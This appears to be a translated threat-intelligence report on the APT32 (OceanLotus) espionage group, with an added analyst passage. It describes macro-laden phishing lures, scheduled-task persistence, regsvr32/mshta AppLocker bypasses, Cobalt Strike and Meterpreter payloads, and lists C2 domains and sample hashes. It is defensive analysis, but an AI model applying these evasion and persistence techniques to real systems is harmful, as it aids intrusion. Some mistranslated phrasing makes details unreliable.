The threat of cyber espionage

[[192125]]

The cyber espionage operation, now named APT32 (OceanLotus), by Fireeye is targeting private enterprises and foreign governments, dissidents and journalists across multiple industries. Fireeye assesses that APT32 uses a unique and comprehensive malware suite combined with commercial penetration tools to conduct targeted operations in line with Vietnam’s national interests.

APT32 and FireEye Community Response

FireEye's Mandiant incident response consultants were investigating intrusions at several companies with business interests in Vietnam when they discovered intrusion activity and attacker-controlled infrastructure indicative of a significant intrusion campaign. In March 2017, in response to proactive targeting by FireEye customers, the team launched a Community Protection Event (CPE) - a collaboration between the Mandiant incident response team, FireEye as a Service (FaaS) FireEye iSight intelligence, and FireEye product engineers to protect all customers from APT32 activity.

Over the next few weeks, FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32’s tools and phishing lures. This focused intelligence and detection effort allowed us to identify new external victims and obtain enough technical evidence to connect twelve previous intrusions, bringing together four previously unrelated threat actors into FireEye’s newly named Advanced Persistent Threat Group, APT32.

APT32 targets private companies in Southeast Asia

FireEye has observed APT32 targeting foreign businesses with vested interests in Vietnam’s manufacturing, consumer products, and hospitality sectors since at least 2014. There are also indications that APT32 attackers are targeting surrounding cybersecurity and technology infrastructure companies, as well as consulting firms that may have ties to foreign investors.

The following is an overview of FireEye’s investigation into APT32:

    In 2014, a European company was attacked in front of its manufacturing plant in Vietnam. In 2016, foreign companies working in Vietnam in industries such as cybersecurity, technology infrastructure, banking and media were attacked.

    In mid-2016, malware that FireEye believes is unique to APT32 was discovered on the network of a global hospitality developer planning to expand its operations in Vietnam.

    From 2016 to 2017, subsidiaries of U.S. and Philippine consumer product companies located in Vietnam were targeted by APT32 intrusion operations. In 2017, APT32 hacked into the Vietnam office of a global consulting firm.

Table 1 shows a breakdown of APT32 activity, including the malware families used in each campaign.

APT32’s interest in political influence and foreign governments

In addition to focusing on the private sector with ties to Vietnam, APT32 has also targeted foreign governments as well as Vietnamese dissidents and journalists since at least 2013. Here is an overview of this activity:

The Electronic Frontier Foundation (EFF) has published a public blog announcing that journalists, activists, dissidents and bloggers were targeted in 2013 using malware and tactics consistent with APT32 operations.

In 2014, APT32 used a phishing attachment named "Plan to hold a protest in the Vietnamese embassy.exe" to target dissident activities among Vietnamese exiles in Southeast Asia. In 2014, APT32 carried out intrusions into Western legislatures.

In 2015, SkyEye Labs, the security research arm of Chinese company Qihoo 360, released a report detailing threat actors targeting Chinese public and private institutions, including government agencies, research institutions, maritime agencies, offshore construction and shipping companies. Information in the report indicated that the perpetrators used the same malware as APT32, with overlapping infrastructure and similar targets.

In 2015 and 2016, two Vietnamese media outlets were attacked by malware that FireEye assessed as belonging to APT32.

In 2017, attackers provided evidence in social engineering content lures that they were Vietnamese immigrants in Australia and government employees in the Philippines.

APT32 tactics

In the current campaign, APT32 uses ActiveMime files and social engineering techniques to trick victims into launching macros. Once executed, the initialized file downloads multiple malicious payloads from a remote server. APT32 attackers continue to deliver malicious attachments through phishing emails.

APT32 attackers designed multi-language bait documents to target victims. Although these files have a ".doc" file extension, the recovered phishing lures are ActiveMime ".mht" web page archives containing text and images. These files were probably created by exporting Word documents to a single file web page.

Table 2 contains examples of recovered APT32 multi-language decoy documents.

Table 2: APT32 decoy document samples

The Base64-encoded ActiveMime data also contains an OLE file with a malicious macro. When opened, many of the decoy documents display a fake error message in an attempt to trick the user into launching the malicious macro. Figure 1 shows a fake Gmail subject and hexadecimal error code matching, asking the recipient to enable content to resolve the error. Figure 2 shows another APT32 lure that uses a convincing fake Windows error message to instruct the recipient to enable content in order to correctly display the document's font characters.

Figure 1: APT32 phishing lure – fake Gmail error message

Figure 2: Example of APT32 phishing lure – fake file encoding error message

APT32 operators implemented a number of novel techniques to track the effectiveness of their phishing campaigns, monitor the distribution of malicious documents, and establish persistence mechanisms to dynamically update the backdoor injected into memory.

To track who opened the phishing emails, viewed the links, and downloaded the attachments in real time, APT32 used cloud-based email analysis software designed for sales organizations. In some cases, APT32 simply forgoes the attachments in the emails and relies entirely on this tracking technology, linking to their ActiveMime lures hosted on external, legitimate cloud storage services.

To enhance visibility into further distribution of its phishing lures, APT32 leveraged the local web page functionality of its ActiveMime documents to link to external hosting servers monitored by APT32.

Figure 3 contains a sample phishing lure with an HTML image tag for additional tracking from APT32.

Figure 3: Phishing image containing HTML tags for additional tracking

When opening a document with this capability, Microsoft Word will attempt to download an external image even if macros are disabled. After analyzing all phishing lures, the external image did not exist. Mandiant consultants suspect APT32 is monitoring web logs to track the public IP addresses used to request remote images. Combined with email tracking software, APT32 can keep a close eye on the spread of phishing, success rates, and further analysis of victim organizations, while monitoring things of interest to security companies.

Once macros are enabled on the target system, the malicious macros create two named scheduled tasks with persistence mechanisms on the infected system. The first named scheduled task launches an application whitelisting script protection to bypass the execution of COM scripts, dynamically downloads the first backdoor from the APT32 server and injects it into memory. The second named scheduled task is loaded as an XML file to fake task properties, running Javascript code that downloads and launches a secondary backdoor, provided as a multi-stage Powershell script. In most lures, one scheduled task persists in a specific APT32 backdoor, and the other scheduled task will initialize a commercially available backdoor (Cobaltstrike) as a fallback.

To illustrate the sophistication of these lures, Figure 4 shows the recovered APT32 lure: “2017 Employee Salary and Allowance Amount Statistical Report.doc”.

Figure 4: APT32 ActiveMime decoy creates two named scheduled tasks

In this example, a scheduled task named "Windows Scheduled Maintenance" was created to run CaseySmith's "Squiblydoo" application whitelist. While all payloads can be updated dynamically, when pushed, this task loads a COM scriptlet (file extension of ".sct") which downloads and executes Meterpreter hosted on images.chinabytes.info and then loads Cobalt Strike's BEACON, using Safebrowsing's extensible C2 configuration to communicate with network traffic (for the next step of lateral movement!!) Another scheduled task named "Scheduled Defrags" was created with a post-task creation timestamp of June 2, 2016 after loading the original task XML. The second task runs "mshta.exe" every 50 minutes, which launches an APT32 custom backdoor PowerShell script containing shellcode. It is configured to communicate with the domains blog.panggin.org, share.codehao.net, and yii.yiihao126.net.

Figure 5 shows the chain of events in which APT32 successfully exploited a phishing lure to dynamically inject two multi-stage malicious frameworks into memory.

Figure 5: APT32 phishing chain incident

What’s impressive is that APT32 operations don’t stop once they establish a foothold in a victim environment. Several Mandiant investigations revealed that after gaining access, APT32 would regularly clear selected event log entries and heavily obfuscate its Powershell-based tools and Daniel Bohannon’s shellcode loader – the Invoke-Obfuscation framework.

APT32 frequently uses stealth techniques to blend in with legitimate user activity:

During one investigation, APT32 used a privilege escalation vulnerability (CVE-2016-7255) disguised as a Windows patch.

In another investigation, APT32 compromised McAfee Epo servers and pushed their malware payloads to all systems as software deployment tasks distributed by the Epo server’s proprietary SPIPE protocol.

APT32 also uses hidden or non-printing characters to help visually camouflage its malware on the system. For example: APT32 installs a backdoor as a persistent service with a legitimate service name supplemented by a Unicode endless space character. Another backdoor uses a legitimate DLL filled with non-printing system command control characters.

APT32 malware and servers

APT32 appears to have extensive resources to develop and use multiple custom multi-protocol backdoors. APT32 operators are characterized by the deployment of malware payloads that include WINDSHIELD, KOMPROGO, SOUNDBITE, and PHOREAL signatures. APT32 frequently deploys these backdoors as well as the commercially available Cobalt Strike Beacon backdoor. APT32 also has backdoor development capabilities for macOS.

The unique features of malware kits are shown in Table 3.

Table 3: APT32 malware capabilities

APT32 operators appear to be well-resourced and supported, as they use a large number of domain names and IP addresses as control servers. The FireEye Isight Intelligence MySIGHT Portal contains more information about these backdoor families based on Mandiant's investigation into APT32 intrusions.

Figure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.

Figure 6: APT32 attack lifecycle

Outlook and Inspiration

FireEye assesses APT32 as a cyber espionage group consistent with Vietnamese government exploits based on time response investigations, product detections and intelligence observations, and other publications by relevant operators. APT32's targeting of private sector interests is noteworthy, and FireEye believes that the attackers pose a significant risk to companies doing business or preparing to invest in the country. While the motivations for intrusions by each APT32 unit vary and in some cases are unknown, unauthorized access (generally referred to as intrusions) can be used as a platform for law enforcement, intellectual property theft, and anti-corruption measures. Ultimately, it may erode the competitive advantage of the target organization. In addition, APT32 continues to threaten political activities and freedom of expression in the public sector in Southeast Asia and around the world. Governments, journalists, and members of the Vietnamese Communist Party may continue to be its targets.

APT32 Detection

Figure 7 contains a Yara rule that can be used to identify malicious macros associated with APT32’s phishing lures:

Figure 7: Yara rules for APT32 malicious macros

Table 4 contains server samples associated with APT32 C2 by FireEye

Table 4: APT32 C2 server samples

Finally, OceanLotus has a great impact on our government units and enterprises. Many times we always think that APT is far away from us, but in the recent DFIR process, SkyEye Lab and Antiy have released reports that have made a very detailed analysis of the OceanLotus backdoor. Of course, there are many samples, but due to the lack of understanding of its internal organization, the analysis and positioning of its organization have been quite vague for a long time (such as the claim of quasi-APT). This article temporarily fills the curiosity of some people and introduces the determination of a certain country. . . As FireEye said, the obfuscation of related logs and PS will basically not give you any clues, so you can only rely on platforms like SIEM for correlation and backtracking. As FireEye said, this organization began to become active again during the period from January to March, and in a certain investigation, it was found that this organization was quite familiar with the customs and festivals of the country it invaded. For example, during a certain abnormal traffic occurrence, it was concentrated on January 26, and later it was learned that January 27 was the New Year's Eve holiday. . . They often know the habits of administrators and the security companies in their country (for example, security personnel often use AWVS, and then they release a cracked version, and then you get hacked), and are quite familiar with information collection. The following figure shows the files during the investigation in March.

The following figure shows the process of OceanLotus using regsvr32.exe to download and load the icon7.gif backdoor. This purpose is to bypass Applocker

[[192126]]

The following figure is a screenshot of the icon7.gif sample, calling the System.dll module.

sha256:95DFCCF3933A43676A967DE39A8A6C1297729836EEAA5833B5EEE46102B1E1BB

Even up to now, many payloads are still in an anti-killing state.

[[192128]]

Here is Hubble's analysis:

https://habo.qq.com/file/showdetail?md5=569797689d2f779668b107224d36beb0

Its IOC matches the OceanLotus we have been tracking.

SHA256:0692DF991CB7CCC2DC50E13817AE682BD2C1ECC0F8F46CFDC9CC9D34CE7215AD

The recent WannaCry ransomware incident caused a large number of hosts to fall. At the same time, OceanLotus also took advantage of the situation on the 12th. Although there is still relatively little knowledge about the organization, it is certain that the organization does use Vietnamese citizens to cover up their identities. Generally speaking, its actions are relatively covert, but perhaps due to factors of individual members or certain tasks or the need to expand the results, sometimes quite aggressive attacks are taken (such as attacking core switches, ARP attacks, etc.). Perhaps the exposure of FireEye will temporarily make it quiet for a while.